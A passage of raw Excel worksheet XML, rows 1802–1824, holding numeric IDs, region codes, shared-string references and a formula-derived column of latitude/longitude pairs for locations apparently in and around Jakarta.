        <v>1137</v>
      </c>
      <c r="L1802" t="s">
        <v>6151</v>
      </c>
      <c r="M1802">
        <v>3174020005</v>
      </c>
      <c r="N1802">
        <v>3174020</v>
      </c>
      <c r="O1802">
        <v>3174</v>
      </c>
      <c r="P1802">
        <v>31</v>
      </c>
      <c r="Q1802" t="s">
        <v>30</v>
      </c>
      <c r="R1802" t="s">
        <v>31</v>
      </c>
      <c r="S1802" t="s">
        <v>32</v>
      </c>
      <c r="T1802" t="s">
        <v>33</v>
      </c>
      <c r="U1802" s="5">
        <v>10677893</v>
      </c>
      <c r="V1802" s="5" t="s">
        <v>16083</v>
      </c>
      <c r="W1802" s="5">
        <v>-618303</v>
      </c>
      <c r="X1802" t="s">
        <v>19840</v>
      </c>
      <c r="Y1802" t="str">
        <f t="shared" si="28"/>
        <v>-6.18303,106.77893</v>
      </c>
    </row>
    <row r="1803" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1803">
        <v>109330</v>
      </c>
      <c r="B1803" s="1">
        <v>43886</v>
      </c>
      <c r="C1803">
        <v>0</v>
      </c>
      <c r="D1803" t="s">
        <v>22</v>
      </c>
      <c r="E1803" t="s">
        <v>23</v>
      </c>
      <c r="F1803" t="s">
        <v>6152</v>
      </c>
      <c r="H1803" t="s">
        <v>26</v>
      </c>
      <c r="I1803" t="s">
        <v>2300</v>
      </c>
      <c r="J1803" t="s">
        <v>3810</v>
      </c>
      <c r="L1803" t="s">
        <v>6153</v>
      </c>
      <c r="M1803">
        <v>3175050003</v>
      </c>
      <c r="N1803">
        <v>3175050</v>
      </c>
      <c r="O1803">
        <v>3175</v>
      </c>
      <c r="P1803">
        <v>31</v>
      </c>
      <c r="Q1803" t="s">
        <v>1740</v>
      </c>
      <c r="R1803" t="s">
        <v>1013</v>
      </c>
      <c r="S1803" t="s">
        <v>547</v>
      </c>
      <c r="T1803" t="s">
        <v>33</v>
      </c>
      <c r="U1803" s="5">
        <v>10691458</v>
      </c>
      <c r="V1803" s="5" t="s">
        <v>16084</v>
      </c>
      <c r="W1803" s="5">
        <v>-616740</v>
      </c>
      <c r="X1803" t="s">
        <v>19841</v>
      </c>
      <c r="Y1803" t="str">
        <f t="shared" si="28"/>
        <v>-6.16740,106.91458</v>
      </c>
    </row>
    <row r="1804" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1804">
        <v>109331</v>
      </c>
      <c r="B1804" s="1">
        <v>43886</v>
      </c>
      <c r="C1804">
        <v>0</v>
      </c>
      <c r="D1804" t="s">
        <v>22</v>
      </c>
      <c r="E1804" t="s">
        <v>23</v>
      </c>
      <c r="F1804" t="s">
        <v>6154</v>
      </c>
      <c r="H1804" t="s">
        <v>26</v>
      </c>
      <c r="I1804" t="s">
        <v>585</v>
      </c>
      <c r="J1804" t="s">
        <v>6155</v>
      </c>
      <c r="L1804" t="s">
        <v>6156</v>
      </c>
      <c r="M1804">
        <v>3174010001</v>
      </c>
      <c r="N1804">
        <v>3174010</v>
      </c>
      <c r="O1804">
        <v>3174</v>
      </c>
      <c r="P1804">
        <v>31</v>
      </c>
      <c r="Q1804" t="s">
        <v>239</v>
      </c>
      <c r="R1804" t="s">
        <v>69</v>
      </c>
      <c r="S1804" t="s">
        <v>32</v>
      </c>
      <c r="T1804" t="s">
        <v>33</v>
      </c>
      <c r="U1804" s="5">
        <v>10671982</v>
      </c>
      <c r="V1804" s="5" t="s">
        <v>16085</v>
      </c>
      <c r="W1804" s="5">
        <v>-621755</v>
      </c>
      <c r="X1804" t="s">
        <v>19842</v>
      </c>
      <c r="Y1804" t="str">
        <f t="shared" si="28"/>
        <v>-6.21755,106.71982</v>
      </c>
    </row>
    <row r="1805" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1805">
        <v>109332</v>
      </c>
      <c r="B1805" s="1">
        <v>43886</v>
      </c>
      <c r="C1805">
        <v>0</v>
      </c>
      <c r="D1805" t="s">
        <v>22</v>
      </c>
      <c r="E1805" t="s">
        <v>23</v>
      </c>
      <c r="F1805" t="s">
        <v>6157</v>
      </c>
      <c r="G1805" t="s">
        <v>6158</v>
      </c>
      <c r="H1805" t="s">
        <v>26</v>
      </c>
      <c r="I1805" t="s">
        <v>386</v>
      </c>
      <c r="J1805" t="s">
        <v>2627</v>
      </c>
      <c r="L1805" t="s">
        <v>6159</v>
      </c>
      <c r="M1805">
        <v>3216082008</v>
      </c>
      <c r="N1805">
        <v>3216082</v>
      </c>
      <c r="O1805">
        <v>3216</v>
      </c>
      <c r="P1805">
        <v>32</v>
      </c>
      <c r="Q1805" t="s">
        <v>2098</v>
      </c>
      <c r="R1805" t="s">
        <v>601</v>
      </c>
      <c r="S1805" t="s">
        <v>41</v>
      </c>
      <c r="T1805" t="s">
        <v>42</v>
      </c>
      <c r="U1805" s="5">
        <v>10707185</v>
      </c>
      <c r="V1805" s="5" t="s">
        <v>16086</v>
      </c>
      <c r="W1805" s="5">
        <v>-619532</v>
      </c>
      <c r="X1805" t="s">
        <v>19843</v>
      </c>
      <c r="Y1805" t="str">
        <f t="shared" si="28"/>
        <v>-6.19532,107.07185</v>
      </c>
    </row>
    <row r="1806" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1806">
        <v>110308</v>
      </c>
      <c r="B1806" s="1">
        <v>43886</v>
      </c>
      <c r="C1806">
        <v>0</v>
      </c>
      <c r="D1806" t="s">
        <v>2648</v>
      </c>
      <c r="E1806" t="s">
        <v>23</v>
      </c>
      <c r="G1806" t="s">
        <v>2764</v>
      </c>
      <c r="H1806" t="s">
        <v>26</v>
      </c>
      <c r="J1806" t="s">
        <v>2765</v>
      </c>
      <c r="L1806" t="s">
        <v>2766</v>
      </c>
      <c r="M1806">
        <v>3174030006</v>
      </c>
      <c r="N1806">
        <v>3174030</v>
      </c>
      <c r="O1806">
        <v>3174</v>
      </c>
      <c r="P1806">
        <v>31</v>
      </c>
      <c r="Q1806" t="s">
        <v>2529</v>
      </c>
      <c r="R1806" t="s">
        <v>1487</v>
      </c>
      <c r="S1806" t="s">
        <v>32</v>
      </c>
      <c r="T1806" t="s">
        <v>33</v>
      </c>
      <c r="U1806" s="5">
        <v>10680438</v>
      </c>
      <c r="V1806" s="5" t="s">
        <v>15068</v>
      </c>
      <c r="W1806" s="5">
        <v>-617755</v>
      </c>
      <c r="X1806" t="s">
        <v>18874</v>
      </c>
      <c r="Y1806" t="str">
        <f t="shared" si="28"/>
        <v>-6.17755,106.80438</v>
      </c>
    </row>
    <row r="1807" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1807">
        <v>110309</v>
      </c>
      <c r="B1807" s="1">
        <v>43886</v>
      </c>
      <c r="C1807">
        <v>0</v>
      </c>
      <c r="D1807" t="s">
        <v>2648</v>
      </c>
      <c r="E1807" t="s">
        <v>23</v>
      </c>
      <c r="G1807" t="s">
        <v>2774</v>
      </c>
      <c r="H1807" t="s">
        <v>26</v>
      </c>
      <c r="J1807" t="s">
        <v>2775</v>
      </c>
      <c r="L1807" t="s">
        <v>2766</v>
      </c>
      <c r="M1807">
        <v>3173020002</v>
      </c>
      <c r="N1807">
        <v>3173020</v>
      </c>
      <c r="O1807">
        <v>3173</v>
      </c>
      <c r="P1807">
        <v>31</v>
      </c>
      <c r="Q1807" t="s">
        <v>2592</v>
      </c>
      <c r="R1807" t="s">
        <v>179</v>
      </c>
      <c r="S1807" t="s">
        <v>62</v>
      </c>
      <c r="T1807" t="s">
        <v>33</v>
      </c>
      <c r="U1807" s="5">
        <v>10684426</v>
      </c>
      <c r="V1807" s="5" t="s">
        <v>15071</v>
      </c>
      <c r="W1807" s="5">
        <v>-620151</v>
      </c>
      <c r="X1807" t="s">
        <v>18877</v>
      </c>
      <c r="Y1807" t="str">
        <f t="shared" si="28"/>
        <v>-6.20151,106.84426</v>
      </c>
    </row>
    <row r="1808" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1808">
        <v>110310</v>
      </c>
      <c r="B1808" s="1">
        <v>43886</v>
      </c>
      <c r="C1808">
        <v>0</v>
      </c>
      <c r="D1808" t="s">
        <v>2648</v>
      </c>
      <c r="E1808" t="s">
        <v>23</v>
      </c>
      <c r="G1808" t="s">
        <v>2761</v>
      </c>
      <c r="H1808" t="s">
        <v>26</v>
      </c>
      <c r="J1808" t="s">
        <v>2762</v>
      </c>
      <c r="L1808" t="s">
        <v>2763</v>
      </c>
      <c r="M1808">
        <v>3173050002</v>
      </c>
      <c r="N1808">
        <v>3173050</v>
      </c>
      <c r="O1808">
        <v>3173</v>
      </c>
      <c r="P1808">
        <v>31</v>
      </c>
      <c r="Q1808" t="s">
        <v>588</v>
      </c>
      <c r="R1808" t="s">
        <v>589</v>
      </c>
      <c r="S1808" t="s">
        <v>62</v>
      </c>
      <c r="T1808" t="s">
        <v>33</v>
      </c>
      <c r="U1808" s="5">
        <v>10687585</v>
      </c>
      <c r="V1808" s="5" t="s">
        <v>15067</v>
      </c>
      <c r="W1808" s="5">
        <v>-617859</v>
      </c>
      <c r="X1808" t="s">
        <v>18873</v>
      </c>
      <c r="Y1808" t="str">
        <f t="shared" si="28"/>
        <v>-6.17859,106.87585</v>
      </c>
    </row>
    <row r="1809" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1809">
        <v>110313</v>
      </c>
      <c r="B1809" s="1">
        <v>43886</v>
      </c>
      <c r="C1809">
        <v>0</v>
      </c>
      <c r="D1809" t="s">
        <v>2648</v>
      </c>
      <c r="E1809" t="s">
        <v>23</v>
      </c>
      <c r="G1809" t="s">
        <v>2714</v>
      </c>
      <c r="H1809" t="s">
        <v>26</v>
      </c>
      <c r="J1809" t="s">
        <v>2715</v>
      </c>
      <c r="L1809" t="s">
        <v>2716</v>
      </c>
      <c r="M1809">
        <v>3172050004</v>
      </c>
      <c r="N1809">
        <v>3172050</v>
      </c>
      <c r="O1809">
        <v>3172</v>
      </c>
      <c r="P1809">
        <v>31</v>
      </c>
      <c r="Q1809" t="s">
        <v>2717</v>
      </c>
      <c r="R1809" t="s">
        <v>358</v>
      </c>
      <c r="S1809" t="s">
        <v>49</v>
      </c>
      <c r="T1809" t="s">
        <v>33</v>
      </c>
      <c r="U1809" s="5">
        <v>10687569</v>
      </c>
      <c r="V1809" s="5" t="s">
        <v>15050</v>
      </c>
      <c r="W1809" s="5">
        <v>-630136</v>
      </c>
      <c r="X1809" t="s">
        <v>18856</v>
      </c>
      <c r="Y1809" t="str">
        <f t="shared" si="28"/>
        <v>-6.30136,106.87569</v>
      </c>
    </row>
    <row r="1810" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1810">
        <v>110314</v>
      </c>
      <c r="B1810" s="1">
        <v>43886</v>
      </c>
      <c r="C1810">
        <v>0</v>
      </c>
      <c r="D1810" t="s">
        <v>2648</v>
      </c>
      <c r="E1810" t="s">
        <v>23</v>
      </c>
      <c r="G1810" t="s">
        <v>2767</v>
      </c>
      <c r="H1810" t="s">
        <v>26</v>
      </c>
      <c r="J1810" t="s">
        <v>2768</v>
      </c>
      <c r="L1810" t="s">
        <v>2769</v>
      </c>
      <c r="M1810">
        <v>3174030006</v>
      </c>
      <c r="N1810">
        <v>3174030</v>
      </c>
      <c r="O1810">
        <v>3174</v>
      </c>
      <c r="P1810">
        <v>31</v>
      </c>
      <c r="Q1810" t="s">
        <v>2529</v>
      </c>
      <c r="R1810" t="s">
        <v>1487</v>
      </c>
      <c r="S1810" t="s">
        <v>32</v>
      </c>
      <c r="T1810" t="s">
        <v>33</v>
      </c>
      <c r="U1810" s="5">
        <v>10680441</v>
      </c>
      <c r="V1810" s="5" t="s">
        <v>15069</v>
      </c>
      <c r="W1810" s="5">
        <v>-617949</v>
      </c>
      <c r="X1810" t="s">
        <v>18875</v>
      </c>
      <c r="Y1810" t="str">
        <f t="shared" si="28"/>
        <v>-6.17949,106.80441</v>
      </c>
    </row>
    <row r="1811" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1811">
        <v>110315</v>
      </c>
      <c r="B1811" s="1">
        <v>43886</v>
      </c>
      <c r="C1811">
        <v>0</v>
      </c>
      <c r="D1811" t="s">
        <v>2648</v>
      </c>
      <c r="E1811" t="s">
        <v>23</v>
      </c>
      <c r="G1811" t="s">
        <v>2744</v>
      </c>
      <c r="H1811" t="s">
        <v>26</v>
      </c>
      <c r="J1811" t="s">
        <v>1605</v>
      </c>
      <c r="L1811" t="s">
        <v>2745</v>
      </c>
      <c r="M1811">
        <v>3174040007</v>
      </c>
      <c r="N1811">
        <v>3174040</v>
      </c>
      <c r="O1811">
        <v>3174</v>
      </c>
      <c r="P1811">
        <v>31</v>
      </c>
      <c r="Q1811" t="s">
        <v>389</v>
      </c>
      <c r="R1811" t="s">
        <v>377</v>
      </c>
      <c r="S1811" t="s">
        <v>32</v>
      </c>
      <c r="T1811" t="s">
        <v>33</v>
      </c>
      <c r="U1811" s="5">
        <v>10678580</v>
      </c>
      <c r="V1811" s="5" t="s">
        <v>15060</v>
      </c>
      <c r="W1811" s="5">
        <v>-614594</v>
      </c>
      <c r="X1811" t="s">
        <v>18866</v>
      </c>
      <c r="Y1811" t="str">
        <f t="shared" si="28"/>
        <v>-6.14594,106.78580</v>
      </c>
    </row>
    <row r="1812" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1812">
        <v>110316</v>
      </c>
      <c r="B1812" s="1">
        <v>43886</v>
      </c>
      <c r="C1812">
        <v>0</v>
      </c>
      <c r="D1812" t="s">
        <v>2648</v>
      </c>
      <c r="E1812" t="s">
        <v>23</v>
      </c>
      <c r="G1812" t="s">
        <v>2734</v>
      </c>
      <c r="H1812" t="s">
        <v>26</v>
      </c>
      <c r="J1812" t="s">
        <v>1590</v>
      </c>
      <c r="L1812" t="s">
        <v>2735</v>
      </c>
      <c r="M1812">
        <v>3175050001</v>
      </c>
      <c r="N1812">
        <v>3175050</v>
      </c>
      <c r="O1812">
        <v>3175</v>
      </c>
      <c r="P1812">
        <v>31</v>
      </c>
      <c r="Q1812" t="s">
        <v>1037</v>
      </c>
      <c r="R1812" t="s">
        <v>1013</v>
      </c>
      <c r="S1812" t="s">
        <v>547</v>
      </c>
      <c r="T1812" t="s">
        <v>33</v>
      </c>
      <c r="U1812" s="5">
        <v>10688753</v>
      </c>
      <c r="V1812" s="5" t="s">
        <v>15056</v>
      </c>
      <c r="W1812" s="5">
        <v>-615258</v>
      </c>
      <c r="X1812" t="s">
        <v>18863</v>
      </c>
      <c r="Y1812" t="str">
        <f t="shared" si="28"/>
        <v>-6.15258,106.88753</v>
      </c>
    </row>
    <row r="1813" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1813">
        <v>110317</v>
      </c>
      <c r="B1813" s="1">
        <v>43886</v>
      </c>
      <c r="C1813">
        <v>0</v>
      </c>
      <c r="D1813" t="s">
        <v>2648</v>
      </c>
      <c r="E1813" t="s">
        <v>23</v>
      </c>
      <c r="G1813" t="s">
        <v>2779</v>
      </c>
      <c r="H1813" t="s">
        <v>26</v>
      </c>
      <c r="J1813" t="s">
        <v>1715</v>
      </c>
      <c r="L1813" t="s">
        <v>2780</v>
      </c>
      <c r="M1813">
        <v>3175010005</v>
      </c>
      <c r="N1813">
        <v>3175010</v>
      </c>
      <c r="O1813">
        <v>3175</v>
      </c>
      <c r="P1813">
        <v>31</v>
      </c>
      <c r="Q1813" t="s">
        <v>1686</v>
      </c>
      <c r="R1813" t="s">
        <v>546</v>
      </c>
      <c r="S1813" t="s">
        <v>547</v>
      </c>
      <c r="T1813" t="s">
        <v>33</v>
      </c>
      <c r="U1813" s="5">
        <v>10676877</v>
      </c>
      <c r="V1813" s="5" t="s">
        <v>15073</v>
      </c>
      <c r="W1813" s="5">
        <v>-610769</v>
      </c>
      <c r="X1813" t="s">
        <v>18879</v>
      </c>
      <c r="Y1813" t="str">
        <f t="shared" si="28"/>
        <v>-6.10769,106.76877</v>
      </c>
    </row>
    <row r="1814" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1814">
        <v>110318</v>
      </c>
      <c r="B1814" s="1">
        <v>43886</v>
      </c>
      <c r="C1814">
        <v>0</v>
      </c>
      <c r="D1814" t="s">
        <v>2648</v>
      </c>
      <c r="E1814" t="s">
        <v>23</v>
      </c>
      <c r="G1814" t="s">
        <v>2770</v>
      </c>
      <c r="H1814" t="s">
        <v>26</v>
      </c>
      <c r="J1814" t="s">
        <v>644</v>
      </c>
      <c r="L1814" t="s">
        <v>2771</v>
      </c>
      <c r="M1814">
        <v>3174070002</v>
      </c>
      <c r="N1814">
        <v>3174070</v>
      </c>
      <c r="O1814">
        <v>3174</v>
      </c>
      <c r="P1814">
        <v>31</v>
      </c>
      <c r="Q1814" t="s">
        <v>621</v>
      </c>
      <c r="R1814" t="s">
        <v>84</v>
      </c>
      <c r="S1814" t="s">
        <v>32</v>
      </c>
      <c r="T1814" t="s">
        <v>33</v>
      </c>
      <c r="U1814" s="5">
        <v>10674592</v>
      </c>
      <c r="V1814" s="5" t="s">
        <v>15070</v>
      </c>
      <c r="W1814" s="5">
        <v>-616355</v>
      </c>
      <c r="X1814" t="s">
        <v>18876</v>
      </c>
      <c r="Y1814" t="str">
        <f t="shared" si="28"/>
        <v>-6.16355,106.74592</v>
      </c>
    </row>
    <row r="1815" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1815">
        <v>110319</v>
      </c>
      <c r="B1815" s="1">
        <v>43886</v>
      </c>
      <c r="C1815">
        <v>0</v>
      </c>
      <c r="D1815" t="s">
        <v>2648</v>
      </c>
      <c r="E1815" t="s">
        <v>23</v>
      </c>
      <c r="G1815" t="s">
        <v>2757</v>
      </c>
      <c r="H1815" t="s">
        <v>26</v>
      </c>
      <c r="J1815" t="s">
        <v>2276</v>
      </c>
      <c r="L1815" t="s">
        <v>2758</v>
      </c>
      <c r="M1815">
        <v>3175060001</v>
      </c>
      <c r="N1815">
        <v>3175060</v>
      </c>
      <c r="O1815">
        <v>3175</v>
      </c>
      <c r="P1815">
        <v>31</v>
      </c>
      <c r="Q1815" t="s">
        <v>2278</v>
      </c>
      <c r="R1815" t="s">
        <v>2279</v>
      </c>
      <c r="S1815" t="s">
        <v>547</v>
      </c>
      <c r="T1815" t="s">
        <v>33</v>
      </c>
      <c r="U1815" s="5">
        <v>10692374</v>
      </c>
      <c r="V1815" s="5" t="s">
        <v>15065</v>
      </c>
      <c r="W1815" s="5">
        <v>-615842</v>
      </c>
      <c r="X1815" t="s">
        <v>18871</v>
      </c>
      <c r="Y1815" t="str">
        <f t="shared" si="28"/>
        <v>-6.15842,106.92374</v>
      </c>
    </row>
    <row r="1816" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1816">
        <v>110321</v>
      </c>
      <c r="B1816" s="1">
        <v>43886</v>
      </c>
      <c r="C1816">
        <v>0</v>
      </c>
      <c r="D1816" t="s">
        <v>2648</v>
      </c>
      <c r="E1816" t="s">
        <v>23</v>
      </c>
      <c r="G1816" t="s">
        <v>2772</v>
      </c>
      <c r="H1816" t="s">
        <v>26</v>
      </c>
      <c r="J1816" t="s">
        <v>2715</v>
      </c>
      <c r="L1816" t="s">
        <v>2773</v>
      </c>
      <c r="M1816">
        <v>3172050004</v>
      </c>
      <c r="N1816">
        <v>3172050</v>
      </c>
      <c r="O1816">
        <v>3172</v>
      </c>
      <c r="P1816">
        <v>31</v>
      </c>
      <c r="Q1816" t="s">
        <v>2717</v>
      </c>
      <c r="R1816" t="s">
        <v>358</v>
      </c>
      <c r="S1816" t="s">
        <v>49</v>
      </c>
      <c r="T1816" t="s">
        <v>33</v>
      </c>
      <c r="U1816" s="5">
        <v>10687569</v>
      </c>
      <c r="V1816" s="5" t="s">
        <v>15050</v>
      </c>
      <c r="W1816" s="5">
        <v>-630136</v>
      </c>
      <c r="X1816" t="s">
        <v>18856</v>
      </c>
      <c r="Y1816" t="str">
        <f t="shared" si="28"/>
        <v>-6.30136,106.87569</v>
      </c>
    </row>
    <row r="1817" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1817">
        <v>110323</v>
      </c>
      <c r="B1817" s="1">
        <v>43886</v>
      </c>
      <c r="C1817">
        <v>0</v>
      </c>
      <c r="D1817" t="s">
        <v>2648</v>
      </c>
      <c r="E1817" t="s">
        <v>23</v>
      </c>
      <c r="G1817" t="s">
        <v>2801</v>
      </c>
      <c r="H1817" t="s">
        <v>26</v>
      </c>
      <c r="J1817" t="s">
        <v>2802</v>
      </c>
      <c r="L1817" t="s">
        <v>2803</v>
      </c>
      <c r="M1817">
        <v>3172080002</v>
      </c>
      <c r="N1817">
        <v>3172080</v>
      </c>
      <c r="O1817">
        <v>3172</v>
      </c>
      <c r="P1817">
        <v>31</v>
      </c>
      <c r="Q1817" t="s">
        <v>2804</v>
      </c>
      <c r="R1817" t="s">
        <v>141</v>
      </c>
      <c r="S1817" t="s">
        <v>49</v>
      </c>
      <c r="T1817" t="s">
        <v>33</v>
      </c>
      <c r="U1817" s="5">
        <v>10693478</v>
      </c>
      <c r="V1817" s="5" t="s">
        <v>15080</v>
      </c>
      <c r="W1817" s="5">
        <v>-619178</v>
      </c>
      <c r="X1817" t="s">
        <v>18886</v>
      </c>
      <c r="Y1817" t="str">
        <f t="shared" si="28"/>
        <v>-6.19178,106.93478</v>
      </c>
    </row>
    <row r="1818" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1818">
        <v>110324</v>
      </c>
      <c r="B1818" s="1">
        <v>43886</v>
      </c>
      <c r="C1818">
        <v>0</v>
      </c>
      <c r="D1818" t="s">
        <v>2648</v>
      </c>
      <c r="E1818" t="s">
        <v>23</v>
      </c>
      <c r="G1818" t="s">
        <v>2793</v>
      </c>
      <c r="H1818" t="s">
        <v>26</v>
      </c>
      <c r="J1818" t="s">
        <v>2737</v>
      </c>
      <c r="L1818" t="s">
        <v>2794</v>
      </c>
      <c r="M1818">
        <v>3173040001</v>
      </c>
      <c r="N1818">
        <v>3173040</v>
      </c>
      <c r="O1818">
        <v>3173</v>
      </c>
      <c r="P1818">
        <v>31</v>
      </c>
      <c r="Q1818" t="s">
        <v>1598</v>
      </c>
      <c r="R1818" t="s">
        <v>1598</v>
      </c>
      <c r="S1818" t="s">
        <v>62</v>
      </c>
      <c r="T1818" t="s">
        <v>33</v>
      </c>
      <c r="U1818" s="5">
        <v>10685564</v>
      </c>
      <c r="V1818" s="5" t="s">
        <v>15057</v>
      </c>
      <c r="W1818" s="5">
        <v>-618839</v>
      </c>
      <c r="X1818" t="s">
        <v>18864</v>
      </c>
      <c r="Y1818" t="str">
        <f t="shared" si="28"/>
        <v>-6.18839,106.85564</v>
      </c>
    </row>
    <row r="1819" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1819">
        <v>110325</v>
      </c>
      <c r="B1819" s="1">
        <v>43886</v>
      </c>
      <c r="C1819">
        <v>0</v>
      </c>
      <c r="D1819" t="s">
        <v>2648</v>
      </c>
      <c r="E1819" t="s">
        <v>23</v>
      </c>
      <c r="G1819" t="s">
        <v>2718</v>
      </c>
      <c r="H1819" t="s">
        <v>26</v>
      </c>
      <c r="J1819" t="s">
        <v>2719</v>
      </c>
      <c r="L1819" t="s">
        <v>2720</v>
      </c>
      <c r="M1819">
        <v>3175050003</v>
      </c>
      <c r="N1819">
        <v>3175050</v>
      </c>
      <c r="O1819">
        <v>3175</v>
      </c>
      <c r="P1819">
        <v>31</v>
      </c>
      <c r="Q1819" t="s">
        <v>1740</v>
      </c>
      <c r="R1819" t="s">
        <v>1013</v>
      </c>
      <c r="S1819" t="s">
        <v>547</v>
      </c>
      <c r="T1819" t="s">
        <v>33</v>
      </c>
      <c r="U1819" s="5">
        <v>10691028</v>
      </c>
      <c r="V1819" s="5" t="s">
        <v>15051</v>
      </c>
      <c r="W1819" s="5">
        <v>-616742</v>
      </c>
      <c r="X1819" t="s">
        <v>18857</v>
      </c>
      <c r="Y1819" t="str">
        <f t="shared" si="28"/>
        <v>-6.16742,106.91028</v>
      </c>
    </row>
    <row r="1820" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1820">
        <v>110326</v>
      </c>
      <c r="B1820" s="1">
        <v>43886</v>
      </c>
      <c r="C1820">
        <v>0</v>
      </c>
      <c r="D1820" t="s">
        <v>2648</v>
      </c>
      <c r="E1820" t="s">
        <v>23</v>
      </c>
      <c r="G1820" t="s">
        <v>2810</v>
      </c>
      <c r="H1820" t="s">
        <v>26</v>
      </c>
      <c r="J1820" t="s">
        <v>2737</v>
      </c>
      <c r="L1820" t="s">
        <v>2811</v>
      </c>
      <c r="M1820">
        <v>3173040001</v>
      </c>
      <c r="N1820">
        <v>3173040</v>
      </c>
      <c r="O1820">
        <v>3173</v>
      </c>
      <c r="P1820">
        <v>31</v>
      </c>
      <c r="Q1820" t="s">
        <v>1598</v>
      </c>
      <c r="R1820" t="s">
        <v>1598</v>
      </c>
      <c r="S1820" t="s">
        <v>62</v>
      </c>
      <c r="T1820" t="s">
        <v>33</v>
      </c>
      <c r="U1820" s="5">
        <v>10685569</v>
      </c>
      <c r="V1820" s="5" t="s">
        <v>15083</v>
      </c>
      <c r="W1820" s="5">
        <v>-618832</v>
      </c>
      <c r="X1820" t="s">
        <v>18889</v>
      </c>
      <c r="Y1820" t="str">
        <f t="shared" si="28"/>
        <v>-6.18832,106.85569</v>
      </c>
    </row>
    <row r="1821" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1821">
        <v>110327</v>
      </c>
      <c r="B1821" s="1">
        <v>43886</v>
      </c>
      <c r="C1821">
        <v>0</v>
      </c>
      <c r="D1821" t="s">
        <v>2648</v>
      </c>
      <c r="E1821" t="s">
        <v>23</v>
      </c>
      <c r="G1821" t="s">
        <v>2733</v>
      </c>
      <c r="H1821" t="s">
        <v>26</v>
      </c>
      <c r="J1821" t="s">
        <v>2715</v>
      </c>
      <c r="L1821" t="s">
        <v>2716</v>
      </c>
      <c r="M1821">
        <v>3172050004</v>
      </c>
      <c r="N1821">
        <v>3172050</v>
      </c>
      <c r="O1821">
        <v>3172</v>
      </c>
      <c r="P1821">
        <v>31</v>
      </c>
      <c r="Q1821" t="s">
        <v>2717</v>
      </c>
      <c r="R1821" t="s">
        <v>358</v>
      </c>
      <c r="S1821" t="s">
        <v>49</v>
      </c>
      <c r="T1821" t="s">
        <v>33</v>
      </c>
      <c r="U1821" s="5">
        <v>10687569</v>
      </c>
      <c r="V1821" s="5" t="s">
        <v>15050</v>
      </c>
      <c r="W1821" s="5">
        <v>-630133</v>
      </c>
      <c r="X1821" t="s">
        <v>18862</v>
      </c>
      <c r="Y1821" t="str">
        <f t="shared" si="28"/>
        <v>-6.30133,106.87569</v>
      </c>
    </row>
    <row r="1822" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1822">
        <v>110328</v>
      </c>
      <c r="B1822" s="1">
        <v>43886</v>
      </c>
      <c r="C1822">
        <v>0</v>
      </c>
      <c r="D1822" t="s">
        <v>2648</v>
      </c>
      <c r="E1822" t="s">
        <v>23</v>
      </c>
      <c r="G1822" t="s">
        <v>2731</v>
      </c>
      <c r="H1822" t="s">
        <v>26</v>
      </c>
      <c r="J1822" t="s">
        <v>2705</v>
      </c>
      <c r="L1822" t="s">
        <v>2732</v>
      </c>
      <c r="M1822">
        <v>3172090006</v>
      </c>
      <c r="N1822">
        <v>3172090</v>
      </c>
      <c r="O1822">
        <v>3172</v>
      </c>
      <c r="P1822">
        <v>31</v>
      </c>
      <c r="Q1822" t="s">
        <v>2283</v>
      </c>
      <c r="R1822" t="s">
        <v>890</v>
      </c>
      <c r="S1822" t="s">
        <v>49</v>
      </c>
      <c r="T1822" t="s">
        <v>33</v>
      </c>
      <c r="U1822" s="5">
        <v>10687771</v>
      </c>
      <c r="V1822" s="5" t="s">
        <v>15055</v>
      </c>
      <c r="W1822" s="5">
        <v>-616999</v>
      </c>
      <c r="X1822" t="s">
        <v>18861</v>
      </c>
      <c r="Y1822" t="str">
        <f t="shared" si="28"/>
        <v>-6.16999,106.87771</v>
      </c>
    </row>
    <row r="1823" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1823">
        <v>110330</v>
      </c>
      <c r="B1823" s="1">
        <v>43886</v>
      </c>
      <c r="C1823">
        <v>0</v>
      </c>
      <c r="D1823" t="s">
        <v>2648</v>
      </c>
      <c r="E1823" t="s">
        <v>23</v>
      </c>
      <c r="G1823" t="s">
        <v>2746</v>
      </c>
      <c r="H1823" t="s">
        <v>26</v>
      </c>
      <c r="J1823" t="s">
        <v>2747</v>
      </c>
      <c r="L1823" t="s">
        <v>2748</v>
      </c>
      <c r="M1823">
        <v>3172090005</v>
      </c>
      <c r="N1823">
        <v>3172090</v>
      </c>
      <c r="O1823">
        <v>3172</v>
      </c>
      <c r="P1823">
        <v>31</v>
      </c>
      <c r="Q1823" t="s">
        <v>2749</v>
      </c>
      <c r="R1823" t="s">
        <v>890</v>
      </c>
      <c r="S1823" t="s">
        <v>49</v>
      </c>
      <c r="T1823" t="s">
        <v>33</v>
      </c>
      <c r="U1823" s="5">
        <v>10688054</v>
      </c>
      <c r="V1823" s="5" t="s">
        <v>15061</v>
      </c>
      <c r="W1823" s="5">
        <v>-619593</v>
      </c>
      <c r="X1823" t="s">
        <v>18867</v>
      </c>
      <c r="Y1823" t="str">
        <f t="shared" si="28"/>
        <v>-6.19593,106.88054</v>
      </c>
    </row>
    <row r="1824" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1824">
        <v>110331</v>
      </c>
      <c r="B1824" s="1">
        <v>43886</v>
      </c>
      <c r="C1824">
        <v>0</v>
      </c>
      <c r="D1824" t="s">
        <v>2648</v>
      </c>
      <c r="E1824" t="s">
        <v>23</v>
      </c>
      <c r="G1824" t="s">
        <v>2742</v>
      </c>
      <c r="H1824" t="s">
        <v>26</v>
      </c>
